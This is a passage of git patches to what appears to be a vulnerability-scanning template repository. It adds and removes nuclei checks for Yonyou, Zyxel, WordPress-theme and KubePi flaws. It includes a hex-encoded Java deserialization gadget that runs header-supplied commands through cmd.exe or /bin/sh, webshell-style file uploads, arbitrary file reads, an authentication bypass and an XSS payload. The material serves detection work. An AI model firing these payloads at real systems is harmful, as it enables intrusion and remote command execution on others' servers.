6C616E672F4F626A6563743B0C0033005E0B0059005F01000372657108006101000B676574526573706F6E73650800630100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0C006500660A002600670100186A6176612F6C616E672F7265666C6563742F4D6574686F64070069010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C006B006C0A006A006D01000967657448656164657208006F01000C582D54304B454E2D494E46300800710100076973456D70747901000328295A0C007300740A004000750100097365745374617475730800770100116A6176612F6C616E672F496E7465676572070079010004545950450100114C6A6176612F6C616E672F436C6173733B0C007B007C09007A007D010004284929560C0004007F0A007A00800100076F732E6E616D650800820100106A6176612F6C616E672F53797374656D07008401000B67657450726F7065727479010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0C008600870A0085008801000B746F4C6F776572436173650C008A003A0A0040008B01000677696E646F7708008D010007636D642E65786508008F0100022F630800910100072F62696E2F73680800930100022D630800950100116A6176612F7574696C2F5363616E6E65720700970100186A6176612F6C616E672F50726F636573734275696C646572070099010016285B4C6A6176612F6C616E672F537472696E673B29560C0004009B0A009A009C010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0C009E009F0A009A00A00100116A6176612F6C616E672F50726F636573730700A201000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0C00A400A50A00A300A6010018284C6A6176612F696F2F496E70757453747265616D3B29560C000400A80A009800A90100025C410800AB01000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0C00AD00AE0A009800AF0100046E6578740C00B1003A0A009800B2010008676574427974657301000428295B420C00B400B50A004000B601002A6F72672E6170616368652E746F6D6361742E7574696C2E636F6465632E62696E6172792E4261736536340800B8010007666F724E616D65010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0C00BA00BB0A002600BC01000C656E636F64654261736536340800BE0100025B420700C00100097365744865616465720800C2010007582D54304B454E0800C4010015284C6A6176612F6C616E672F537472696E673B29560C000400C60A004000C7010005285B4229560C000400C90A004000CA01001F6A6176612F6C616E672F4E6F537563684D6574686F64457863657074696F6E0700CC0100136A6176612E6E696F2E427974654275666665720800CE010004777261700800D00100116765744465636C617265644D6574686F640C00D200660A002600D3010007646F57726974650800D50100136A6176612F6C616E672F457863657074696F6E0700D70100156A6176612F6C616E672F54687265616447726F75700700D90100135B4C6A6176612F6C616E672F537472696E673B0700DB01000D537461636B4D61705461626C6501001F79736F73657269616C2F50776E6572323235373930313132353233373432340100214C79736F73657269616C2F50776E6572323235373930313132353233373432343B01002F6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700E00A00E1000F0021000200E1000000000002000100040005000100060000002F00010001000000052AB700E2B10000000200070000000600010000003500080000000C000100000005000900DF0000000800140005000100060000043A000A00190000031BA70003014C033DB8001AB6001E4E2DB600221224B6002A3A04190404B6003019042DB60036C000383A0503360615061905BEA202E019051506323A07190701A60006A702CA1907B6003C3A081908123EB600449A000D19081246B600449A0006A702AC1907B600221248B6002A3A04190404B6003019041907B600363A091909C1004A9A0006A702861909B60022124CB6002A3A04190404B6003019041909B600363A091909B60022124EB6002A3A04A7001A3A0A1909B60022B60053B60053124EB6002A3A04A70003190404B6003019041909B600363A091909B60022B600531255B6002A3A04A700143A0B1909B600221255B6002A3A04A70003190404B6003019041909B600363A091909B600221257B6002A3A04190404B6003019041909B60036C000593A0C03360D150D190CB9005D0100A201C5190C150DB9006002003A0E190EB600221262B6002A3A04190404B600301904190EB600363A0F190FB60022126403BD0026B60068190F03BD0003B6006E3A10190FB60022127004BD00265903124053B60068190F04BD00035903127253B6006EC000403A08190801A5000B1908B60076990006A701421910B60022127804BD00265903B2007E53B60068191004BD00035903BB007A591100C8B7008153B6006E571283B80089B6008C128EB6004499001906BD0040590312905359041292535905190853A7001606BD00405903129453590412965359051908533A11BB009859BB009A591911B7009DB600A1B600A7B700AA12ACB600B0B600B3B600B73A1212B9B800BD3A13191312BF04BD0026590312C153B600680104BD00035903191253B6006E3A141910B6002212C305BD002659031240535904124053B60068191005BD00035903BB00405912C5B700C8535904BB0040591914C000C1B700CB53B6006E57A700513A1512CFB800BD3A16191612D104BD0026590312C153B600D4191604BD00035903191253B6006E3A091910B6002212D604BD00265903191653B60068191004BD00035903190953B6006E57A70003043D1C990006A70009840D01A7FE351C990006A70014A7000B3A17A70006A70000840601A7FD1EA700083A18A70003B1000500A400B000B3005000D900E800EB00500237029A029D00CD00350301030400D800050312031500D8000100DD000000E5001B03FF002900070005010700DA070032070038010000FC0017070016FC001A07004002FC002507000369070050166007005010FF002F000E0005010700DA070032070038010700160700400700030000070059010000FE007E07000307000307000302FB0050520700DCFF008A00130005010700DA070032070038010700160700400700030000070059010700030700030700030700DC0700C100010700CDFB004DF9000106F8000506FF000200070005010700DA0700320700380100010700D804FF000200070005010700DA07003207003801000005FF00020002000500010700D8040002000D00000002000E000B0000000A000100020010000A00097074000450776E727077010078757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000017672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573000000000000000000000078707371007E00003F4000000000000077080000001000000000787871007E000678')}}
 
-
-
     stop-at-first-match: true
     matchers:
       - type: dsl
         dsl:
           - 'status_code_1 == 200 && contains(header_1,"X-T0ken") && contains(header_1,"MTc5Njc2NTUwNg==")'
           - 'status_code_2 == 200 && contains(header_2,"X-T0ken") && contains(header_2,"MTc5Njc2NTUwNQ==")'
-        condition: or
-
-
-
-# 利用直接改头部
\ No newline at end of file
+        condition: or
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-read.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-read.yaml
deleted file mode 100644
index 08ac1655b3..0000000000
--- a/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-read.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: yonyou-u8-crm-getemaildata-file-read
-
-info:
-  name: 用友U8-CRM getemaildata 任意文件读取
-  author: SleepingBag945
-  severity: high
-  description: |
-    用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件读取漏洞
-  metadata:
-  tags: yonyou
-
-http:
-  - raw:
-      - |
-        POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/json
-
-    matchers:
-      - type: dsl
-        dsl:
-          - status_code_1 == 200 && contains(body_1,"for 16-bit app support")
-        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml
new file mode 100644
index 0000000000..00c3279c2a
--- /dev/null
+++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml
@@ -0,0 +1,29 @@
+id: yonyou-u8-crm-lfi
+
+info:
+  name: UFIDA U8 CRM  getemaildata.php - Arbitrary File Read
+  author: SleepingBag945
+  severity: high
+  description: |
+   There is an arbitrary file reading vulnerability in getemaildata.php of UFIDA U8 CRM customer relationship management system. An attacker can obtain sensitive files in the server through the vulnerability.
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    max-request: 1
+    fofa-query: body="用友U8CRM"
+    verified: true
+  tags: yonyou,u8-crm,lfi
+
+http:
+  - raw:
+      - |
+        POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 200'
+          - 'contains(body_1,"bit app support") && contains(body_1,"extensions") && contains(body_1,"fonts")'
+        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/zyxel/CVE-2022-0342.yaml b/http/vulnerabilities/zyxel/CVE-2022-0342.yaml
deleted file mode 100644
index eed1c60166..0000000000
--- a/http/vulnerabilities/zyxel/CVE-2022-0342.yaml
+++ /dev/null
@@ -1,41 +0,0 @@
-id: CVE-2022-0342
-
-info:
-  name: CVE-2022-0342 Zyxel Authentication Bypass
-  author: SleepingBag945
-  severity: critical
-  description: Zyxel USG/ZyWALL是中国合勤科技(Zyxel)公司的一款防火墙。ZyWALL 4.20版本至4.70版本、USG FLEX 4.50版本至5.20版本、ATP 4.32版本至5.20版本、VPN 4.30版本至5.20版本、NSG 1.20版本至1.33 Patch 4版本存在安全漏洞,攻击者利用该漏洞绕过Web身份验证并获得设备的管理访问权限。
-  tags: zyxel
-
-
-http:
-  - raw:
-      - |
-        GET /cgi-bin/export-cgi?category=config&arg0=startup-config.conf HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
-        Accept-Encoding: gzip, deflate
-        Connection: close
-
-
-
-
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "interface-name"
-        condition: and
-
-      - type: word
-        words:
-          - "text/zyxel"
-        part: header
-        condition: and
-
-      - type: status
-        status:
-          - 200
-
-# https://security.humanativaspa.it/zyxel-authentication-bypass-patch-analysis-cve-2022-0342/
\ No newline at end of file

From ffc96b98b97178d1a0acdcb8549d8df95e07b0e3 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Fri, 15 Sep 2023 18:01:15 +0530
Subject: [PATCH 0375/1090] delete -duplicate

---
 ...-uploadfiledata-arbitrary-file-upload.yaml | 45 -------------------
 1 file changed, 45 deletions(-)
 delete mode 100755 http/vulnerabilities/yonyou/yonyou-grp-u8-uploadfiledata-arbitrary-file-upload.yaml

diff --git a/http/vulnerabilities/yonyou/yonyou-grp-u8-uploadfiledata-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-grp-u8-uploadfiledata-arbitrary-file-upload.yaml
deleted file mode 100755
index 02bb7731bd..0000000000
--- a/http/vulnerabilities/yonyou/yonyou-grp-u8-uploadfiledata-arbitrary-file-upload.yaml
+++ /dev/null
@@ -1,45 +0,0 @@
-id: yonyou-grp-u8-uploadfiledata-arbitrary-file-upload
-
-info:
-  name: yonyou-grp-u8-uploadfiledata-arbitrary-file-upload
-  author: SleepingBag945
-  severity: critical
-  description: 用友 GRP-U8 财务管理软件存在任意文件上传漏洞,攻击者可利用该漏洞上传恶意文件控制目标服务器。
-  reference:
-    - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20UploadFileData%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
-  tags: yonyou,upload
-
-http:
-  - raw:
-      - |
-        POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename={{randstr_1}}.jsp&filename=1.jpg HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-        Accept: */*
-        Content-Type: multipart/form-data
-        Accept-Encoding: gzip
-
-        ------WebKitFormBoundary92pUawKc
-        Content-Disposition: form-data; name="myFile"; filename="test.jpg"
-
-        <% out.println("{{randstr_2}}");%>
-        ------WebKitFormBoundary92pUawKc--
-
-      - |
-        GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-        Accept: */*
-        Accept-Encoding: gzip
-
-
-    req-condition: true
-    matchers:
-      - type: dsl
-        dsl:
-          - "status_code_1 == 200 && contains(body_1,'showSucceedMsg')"
-          - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
-        condition: and
-
-
-# 可尝试启动并调用xpcmdshell执行命令
\ No newline at end of file

From f122fc3ec9b636cde32ab6c02a205c2aa4879828 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Fri, 15 Sep 2023 18:19:17 +0530
Subject: [PATCH 0376/1090] Create CVE-2023-2813.yaml

---
 http/cves/2023/CVE-2023-2813.yaml | 42 +++++++++++++++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-2813.yaml

diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml
new file mode 100644
index 0000000000..33694d615f
--- /dev/null
+++ b/http/cves/2023/CVE-2023-2813.yaml
@@ -0,0 +1,42 @@
+id: CVE-2023-2813
+
+info:
+  name: Wordpress Multiple Themes - Reflected Cross-Site Scripting
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    All of the above Aapna WordPress theme through 1.3, Anand WordPress theme through 1.2, Anfaust WordPress theme through 1.1, Arendelle WordPress theme before 1.1.13, Atlast Business WordPress theme through 1.5.8.5, Bazaar Lite WordPress theme before 1.8.6, Brain Power WordPress theme through 1.2, BunnyPressLite WordPress theme before 2.1, Cafe Bistro WordPress theme before 1.1.4, College WordPress theme before 1.5.1, Connections Reloaded WordPress theme through 3.1, Counterpoint WordPress theme through 1.8.1, Digitally WordPress theme through 1.0.8, Directory WordPress theme before 3.0.2, Drop WordPress theme before 1.22, Everse WordPress theme before 1.2.4, Fashionable Store WordPress theme through 1.3.4, Fullbase WordPress theme before 1.2.1, Ilex WordPress theme before 1.4.2, Js O3 Lite WordPress theme through 1.5.8.2, Js Paper WordPress theme through 2.5.7, Kata WordPress theme before 1.2.9, Kata App WordPress theme through 1.0.5, Kata Business WordPress theme through 1.0.2, Looki Lite WordPress theme before 1.3.0, moseter WordPress theme through 1.3.1, Nokke WordPress theme before 1.2.4, Nothing Personal WordPress theme through 1.0.7, Offset Writing WordPress theme through 1.2, Opor Ayam WordPress theme through 18, Pinzolo WordPress theme before 1.2.10, Plato WordPress theme before 1.1.9, Polka Dots WordPress theme through 1.2, Purity Of Soul WordPress theme through 1.9, Restaurant PT WordPress theme before 1.1.3, Saul WordPress theme before 1.1.0, Sean Lite WordPress theme before 1.4.6, Tantyyellow WordPress theme through 1.0.0.5, TIJAJI WordPress theme through 1.43, Tiki Time WordPress theme through 1.3, Tuaug4 WordPress theme through 1.4, Tydskrif WordPress theme through 1.1.3, UltraLight WordPress theme through 1.2, Venice Lite WordPress theme before 1.5.5, Viala WordPress theme through 1.3.1, viburno WordPress theme before 1.3.2, Wedding Bride WordPress theme before 1.0.2, Wlow WordPress theme before 1.2.7 suffer from the same issue about the search box reflecting the results causing XSS which allows an unauthenticated attacker to exploit against users if they click a malicious link.
+  reference:
+    - https://wpscan.com/vulnerability/f434afd3-7de4-4bf4-a9bb-9f9aeaae1dc5
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-2813
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-2813
+    cwe-id: CWE-79
+    epss-score: 0.00044
+    epss-percentile: 0.08276
+    cpe: cpe:2.3:a:ajaydsouza:connections_reloaded:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2023,wordpress,wp-theme,xss
+
+variables:
+  str: "{{rand_base(6)}}"
+  random: "{{rand_base(3)}}"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?s={{str}}%3CIMG%20%22%22%22%3E%3CIMG%20SRC=/%20onerror=%22alert(document.domain)%22%3E%3C/img%3E/{{random}}/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - ''
+
+      - type: status
+        status:
+          - 200

From 49e2d395002eb72cfb9d784a54f1e54bfe52db0a Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Fri, 15 Sep 2023 19:59:07 +0530
Subject: [PATCH 0377/1090] Update -Template

---
 .../yonyou/yonyou-nc-info-leak.yaml           | 33 ++++++++++
 .../yonyou/yonyou-u8-crm-fileupload.yaml      | 61 +++++++++++++++++++
 ...onyou-u8-crm-getemaildata-file-upload.yaml | 39 ------------
 .../yonyou/yonyou-ufida-nc-username-leak.yaml | 23 -------
 4 files changed, 94 insertions(+), 62 deletions(-)
 create mode 100644 http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml
 create mode 100644 http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml
 delete mode 100644 http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-upload.yaml
 delete mode 100644 http/vulnerabilities/yonyou/yonyou-ufida-nc-username-leak.yaml

diff --git a/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml b/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml
new file mode 100644
index 0000000000..f7129e7f08
--- /dev/null
+++ b/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml
@@ -0,0 +1,33 @@
+id: yonyou-nc-info-leak
+
+info:
+  name: Yonyou UFIDA NC - Information Exposure
+  author: SleepingBag945
+  severity: medium
+  description: |
+    After logging in and visiting the address where the information was leaked, you will have permission to upload files. Then just go back to the homepage and view the published content directly.
+  reference:
+    - https://mp.weixin.qq.com/s/Lu6Zd9LP3PQsb8uzTIcANQ
+    - https://github.com/zhangzhenfeng/AnyScan/blob/master/AnyScanUI/AnyPoc/data/poc/bugscan/exp%EF%BC%8D2311.py
+  metadata:
+    max-request: 1
+    fofa-query: app="用友-UFIDA-NC
+    verified: true
+  tags: yonyou,nc,exposure
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/service/~iufo/com.ufida.web.action.ActionServlet?TableSelectedID&TreeSelectedID&action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "iufo/web/images/usericon.gif"
+          - "/iufo/web/images/tree/tree_plus.gif"
+        condition: and
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml
new file mode 100644
index 0000000000..48a7a4d7d6
--- /dev/null
+++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml
@@ -0,0 +1,61 @@
+id: yonyou-u8-crm-fileupload
+
+info:
+  name: UFIDA U8-CRM getemaildata - Arbitary File Upload
+  author: SleepingBag945,pussycat0x
+  severity: critical
+  description: |
+    There is an arbitrary file upload vulnerability in the getemaildata.php file of UFIDA U8 CRM customer relationship management system. An attacker can obtain server permissions through the vulnerability and attack the server.
+  metadata:
+    max-request: 2
+    fofa-query: body="用友U8CRM"
+    verified: true
+  tags: yonyou,fileupload,u8-crm
+
+http:
+  - raw:
+      - |
+        POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 300
+        Cache-Control: max-age=0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Origin: null
+        Upgrade-Insecure-Requests: 1
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAVuAKsvesmnWtgEP
+        Accept-Encoding: gzip, deflate
+        Accept-Language: zh-CN,zh;q=0.8
+        Cookie: PHPSESSID=ibru7pqnplhi720caq0ev8uvt0
+
+        ------WebKitFormBoundaryAVuAKsvesmnWtgEP
+        Content-Disposition: form-data; name="file"; filename="%s.php "
+        Content-Type: application/octet-stream
+
+        {{randstr}}
+        ------WebKitFormBoundaryAVuAKsvesmnWtgEP
+        Content-Disposition: form-data; name="upload"
+
+        upload
+        ------WebKitFormBoundaryAVuAKsvesmnWtgEP--
+
+
+      - |
+        GET /tmpfile/{{path}}.tmp.mht HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1==200 && status_code_2==200"
+          - "contains(body_2, '{{randstr}}')"
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body_1
+        internal: true
+        name: path
+        group: 1
+        regex:
+          - '([a-zA-Z0-9]+)\.tmp\.mht'
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-upload.yaml
deleted file mode 100644
index fe796c2faa..0000000000
--- a/http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-upload.yaml
+++ /dev/null
@@ -1,39 +0,0 @@
-id: yonyou-u8-crm-getemaildata-file-upload
-
-info:
-  name: 用友U8-CRM getemaildata 任意文件上传
-  author: SleepingBag945
-  severity: critical
-  description: |
-    用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器权限,攻击服务器
-  metadata:
-  tags: yonyou
-
-http:
-  - raw:
-      - |
-        POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: multipart/form-data; 
-
-    matchers:
-      - type: dsl
-        dsl:
-          - status_code_1 == 200 && contains(body_1,"Database error") && contains(body_1,"Microsoft OLE DB Provider for SQL Server")
-        condition: and
-
-
-# POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
-# Host:
-# Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ
-
-# ------WebKitFormBoundarykS5RKgl8t3nwInMQ
-# Content-Disposition: form-data; name="file"; filename="test.php "
-# Content-Type: text/plain
-
-# 
-
-# ------WebKitFormBoundarykS5RKgl8t3nwInMQ
-
-# 访问十六进制减一
-# /tmpfile/updD24D.tmp.php
\ No newline at end of file
diff --git a/http/vulnerabilities/yonyou/yonyou-ufida-nc-username-leak.yaml b/http/vulnerabilities/yonyou/yonyou-ufida-nc-username-leak.yaml
deleted file mode 100644
index e353e2aced..0000000000
--- a/http/vulnerabilities/yonyou/yonyou-ufida-nc-username-leak.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: yonyou-ufida-nc-username-leak
-
-info:
-  name: yonyou-ufida-nc-username-leak
-  author: SleepingBag945
-  severity: medium
-  description: 可获取到所有用户,爆破账号获取cookie,后台可文件上传
-  reference:
-    - https://mp.weixin.qq.com/s/Lu6Zd9LP3PQsb8uzTIcANQ
-  tags: yonyou,nc
-
-http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/service/~iufo/com.ufida.web.action.ActionServlet?TableSelectedID&TreeSelectedID&action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease"
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "目标用户"
-      - type: status
-        status:
-          - 200

From b665b1b0e82abfbe3a811870c76a8f4e35965e43 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 15 Sep 2023 22:11:27 +0530
Subject: [PATCH 0378/1090] info update

---
 http/cves/2023/CVE-2023-4714.yaml | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml
index d85808d771..1de76c7808 100644
--- a/http/cves/2023/CVE-2023-4714.yaml
+++ b/http/cves/2023/CVE-2023-4714.yaml
@@ -1,7 +1,7 @@
 id: CVE-2023-4714
 
 info:
-  name: PlayTube 3.0.1 - Redirect Information Disclosure
+  name: PlayTube 3.0.1 - Information Disclosure
   author: Farish
   severity: high
   description: |
@@ -14,8 +14,9 @@ info:
     cvss-score: 7.5
     cwe-id: CWE-200
   metadata:
-    verified: "true"
-  tags: cve,cve2023,unauth,info-leak
+    max-request: 1
+    verified: true
+  tags: cve,cve2023,playtube,exposure
 
 http:
   - method: GET

From 753e4e5af7f01f48eb09829e52d05f712d43ea5e Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 15 Sep 2023 22:12:25 +0530
Subject: [PATCH 0379/1090] matcher update

---
 http/cves/2023/CVE-2023-4714.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml
index 1de76c7808..2122d9fd39 100644
--- a/http/cves/2023/CVE-2023-4714.yaml
+++ b/http/cves/2023/CVE-2023-4714.yaml
@@ -29,6 +29,7 @@ http:
         words:
           - "razorpay_options"
           - "PlayTube"
+          - "key:"
         condition: and
 
       - type: status

From 428b82492db1b5c73d270db1394da521bebf4e57 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 15 Sep 2023 22:16:06 +0530
Subject: [PATCH 0380/1090] matcher & info update

---
 http/cves/2023/CVE-2023-22463.yaml | 12 +++++-------
 1 file changed, 5 insertions(+), 7 deletions(-)

diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml
index 42a14a55fd..2233bb0300 100644
--- a/http/cves/2023/CVE-2023-22463.yaml
+++ b/http/cves/2023/CVE-2023-22463.yaml
@@ -1,7 +1,7 @@
 id: CVE-2023-22463
 
 info:
-  name: KubePi JwtSigKey - Login Bypass
+  name: KubePi JwtSigKey - Admin Authentication Bypass
   author: DhiyaneshDK
   severity: critical
   description: |
@@ -19,12 +19,12 @@ info:
     epss-percentile: 0.26993
     cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:*
   metadata:
-    verified: true
     max-request: 1
-    vendor: fit2cloud
-    product: kubepi
+    verified: true
     shodan-query: html:"kubepi"
     fofa-query: "kubepi"
+    vendor: fit2cloud
+    product: kubepi
   tags: cve,cve2023,kubepi,k8s,auth-bypass
 
 variables:
@@ -39,9 +39,6 @@ http:
       - |
         POST /kubepi/api/v1/users HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/105.0.5195.127 Safari/537.36
-        Accept: application/json
-        Accept-Encoding: gzip, deflate
         Authorization: Bearer {{token}}
 
         {
@@ -66,6 +63,7 @@ http:
         words:
           - '"password":'
           - '"isAdmin":'
+          - '"createAt":'
         condition: and
 
       - type: word

From 890cc71933f32bfbc3822ec53005279789240614 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 16:46:34 +0000
Subject: [PATCH 0381/1090] Auto Generated New Template Addition List [Fri Sep
 15 16:46:34 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 83947102d5..78dc56cfa6 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,6 +1,7 @@
 http/cves/2023/CVE-2023-25573.yaml
 http/cves/2023/CVE-2023-30943.yaml
 http/cves/2023/CVE-2023-39676.yaml
+http/cves/2023/CVE-2023-4714.yaml
 http/exposed-panels/phpldapadmin-panel.yaml
 http/exposed-panels/satis-repository.yaml
 http/exposed-panels/symantec/symantec-phishing-panel.yaml

From a9dd0b499bc0923f68e58d6d6a36328e5002904f Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 16:46:45 +0000
Subject: [PATCH 0382/1090] Auto Generated Templates Checksum [Fri Sep 15
 16:46:45 UTC 2023] :robot:

---
 templates-checksum.txt | 403 +++++++++++++++++++++--------------------
 1 file changed, 202 insertions(+), 201 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 22fde98036..5030351c8a 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2642,6 +2642,7 @@ http/cves/2023/CVE-2023-39676.yaml:66ffbd384c6992c5a70fc66c29a75aa2fdd22f3b
 http/cves/2023/CVE-2023-4173.yaml:6b300087c13e3a095031bc1a2d0f8d8590f1a6d8
 http/cves/2023/CVE-2023-4174.yaml:d2cf616712e64eea743b6c401fbfd482418ec12e
 http/cves/2023/CVE-2023-4634.yaml:c5b05622b14f1397f91ad6fe9fb478b3c769e071
+http/cves/2023/CVE-2023-4714.yaml:32a365c876f157b1fd267ee9bb74bac368424042
 http/default-logins/3com/3com-nj2000-default-login.yaml:c00b706cfbbb60a4377ed00240d60f1b4679f18d
 http/default-logins/UCMDB/ucmdb-default-login.yaml:65a8ff54c063a35e251409ed8bfd1a93e50d42c2
 http/default-logins/abb/cs141-default-login.yaml:8914cccfee6dfcbfbb632cf088ca7a33823561d6
@@ -5823,218 +5824,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
